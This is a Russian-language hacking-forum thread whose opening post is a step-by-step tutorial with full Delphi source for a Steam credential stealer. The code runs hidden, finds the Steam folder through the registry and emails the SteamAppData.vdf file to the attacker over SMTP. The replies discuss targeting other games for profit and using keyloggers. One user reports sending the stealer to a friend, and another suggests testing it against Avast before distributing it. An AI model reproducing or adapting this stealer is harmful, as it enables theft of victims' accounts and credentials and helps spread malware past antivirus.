РЕКЛАМА НА ФОРУМЕ 

РЕКЛАМА НА ФОРУМЕ MultiVPN РЕКЛАМА НА ФОРУМЕ

Создаем стиллер Steam на Delphi

Статус
В этой теме нельзя размещать новые ответы.

by_Trojan

Гость
Всем привет и это моя первая статья. Сегодня мы будем писать свой стиллер на Delphi 7.
Он будет много весить ~800кб

И так что нам нужно будет реализовать:
1. Поиск папки стима и самого файла с пассами
2. Отправка файла на почту.

Поехали.

Откроем Delphi 7, создадим проект. Создали? идем дальше.


Чтобы формы не было при открытии стиллера добавим строку.



Код:
Application.ShowMainForm:= False;
Для работы с реестром в Uses пропишем Registry;


Добавим компонент IdAntiFreeze из вкладки IndyMisc



Добавим переменнные



Код:
var
Form1: TForm1;
m:TIdMessage;
sm:tidsmtp;
att:tidattachment;
Создадим процедуру для коннекта и отправки файла




Код:
procedure send(pathSteam, login, pass, kuda:string);
begin
m:=TIdMessage.create(form1);
m.From.Text:=login;	//логин отправителя
m.Recipients.Add;
m.Recipients.Items[0].Text:=kuda; // Кому
m.Subject:='Привет мой друг';// тема
m.Body.Text:='Это тебе ;)';// текст
sm:=tidsmtp.Create(form1);
sm.AuthenticationType := atLogin;
sm.Host:='smtp.mail.ru'; //smtp-адрес
att:=TIdAttachment.Create(m.MessageParts,pathSteam);
sm.Username:=login; //логин отправителя
sm.Password:=pass;  //пароль отправителя
sm.Connect();
if sm.Connected then
begin
sm.Send(M);
end;
sm.Disconnect;
att.Free;
sm.Free;
end;



Код:
function ReadReg(root:integer; t,key:string):string;
var
s:string;
reg: TRegistry;
begin
reg := TRegistry.Create;
reg.RootKey := root;
reg.OpenKey(key, true);
case reg.Getdatatype(t) of
rdString, rdExpandString:
s:= reg.ReadString(t);
rdInteger:
s:= IntToStr(reg.readinteger(t));
else
s:='other type';
end;
result:=s;
reg.Free;
end;



Код:
function Pars(TextIn, Text, TextOut: string): string;
var
TempStr: string;
begin
Result := '';
TempStr := Text;
TempStr := Copy(TempStr, Pos(TextIn, TempStr) +1, Length(TempStr));
Delete(TempStr, Pos(TextOut, TempStr), Length(TempStr));
Result := TempStr;
end;
Кликаем 2раза по форме




Применим процедуры




Код:
procedure TForm1.FormCreate(Sender: TObject);
var
regpath, path:string;
begin
regpath:=ReadReg(HKEY_CURRENT_USER,'Steam','\Software\Microsoft\Windows\CurrentVersion\Run');
path:=Pars('"',regpath, '"');
path:=ExtractFilePath(path)+'config\SteamAppData.vdf';
send(path, 'логин@mail.ru', 'пароль', 'Куда слать@mail.ru');
end;
Все. С кодом мы закончили. Теперь приступим с изменению иконки и компиляции.

Чтобы изменить иконку надо


Сохраним проект.
File -> Save as -> Обязательно выберите отдельную папку.

Компилируем



Сам exe файл соранен в вашу папку с проектом.
Все стиллер готов :D


Если кто-то что-то не понял: не стесняйтесь напиши что не поняли я обязательно отвечу на вопрос.
Всем новичкам в программировании советую начать с языка Delphi. И делать все проекты на Delphi 7 ибо в Delphi 2010, XE Много чего переделанно (вообщем бредовые версии).

Кто может доработать http://hot-hack.ru/index.php?/topic/309-delphi-steam-stealer/ .

Всем удачи.
 
Сообщения
460
Реакции
235
Баллы
58
Автор красавчик помог пипец как=)
 
Сообщения
61
Реакции
49
Баллы
23
нужно написать приватный стиллер и распространять только проверенным людям и только на этом сайте :D в подполье, только тихо B)
можно сделать чтоб стилил WoT т.к. актуальная игра
 
OP

GRID

Гость
как раз дельфи есть семёрка, попробую накодить :D
 

Nmka

Почетный юзер
Сообщения
100
Реакции
101
Баллы
58
Можно сделать чтоб стилил runescape.com и зарабатывать кучи денег :D
 
Сообщения
61
Реакции
49
Баллы
23
От runescape.com нету это игра на джаве
И брут неберет её :(
а в этой игре есть файл в который сохраняется логи и пасс.
все равно чел играющий в эту игру заходит на сайт, а значит в куки записываются логи и пассы.
 

Nmka

Почетный юзер
Сообщения
100
Реакции
101
Баллы
58
а в этой игре есть файл в который сохраняется логи и пасс.
все равно чел играющий в эту игру заходит на сайт, а значит в куки записываются логи и пассы.
Эта игра браузерная... все виды входа ТОЛЬКО на джаве и нечего там сохранить нельзя... Кейлоггером обычно пользуюсь но больно муторно это всё(
 
Сообщения
61
Реакции
49
Баллы
23
предлагаю создать совместными усилиями хороший многофункциональный слиллер.
 

by_Trojan

Гость
Чтобы его сделать нужно знать Delphi.
И если кто то будет модернизировать его то в разделе Source я выложил 0.01v
Выкладыйвайте свои
 
Сообщения
203
Реакции
100
Баллы
58
Хз, но когда я доделываю его с точностью по инструкции у меня ошибки при компилировании, первая это что то с type =(
 
OP

danil7496

Гость
Блин зачем форма зачем :eek:
 
OP

MavGic

Гость
У меня куча ошибок.Может кто-то скинуть исходник???
 
OP

Bender222

Гость
чёт другу отправил! и ни чё не сработало только ошибку выдало!
 

SiN

Сообщения
735
Реакции
603
Баллы
131
чёт другу отправил! и ни чё не сработало только ошибку выдало!
Прежде чем отпровлять другу нужно у себя на компе проверить или хотябы на виртуалке с каким нибуть антивирусом например с авастом т.к им пользуются 70% населения.
 
OP

Bender222

Гость
Прежде чем отпровлять другу нужно у себя на компе проверить или хотябы на виртуалке с каким нибуть антивирусом например с авастом т.к им пользуются 70% населения.
дак я на компе тоже проверял! у меня сработало а у друзей нет!
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху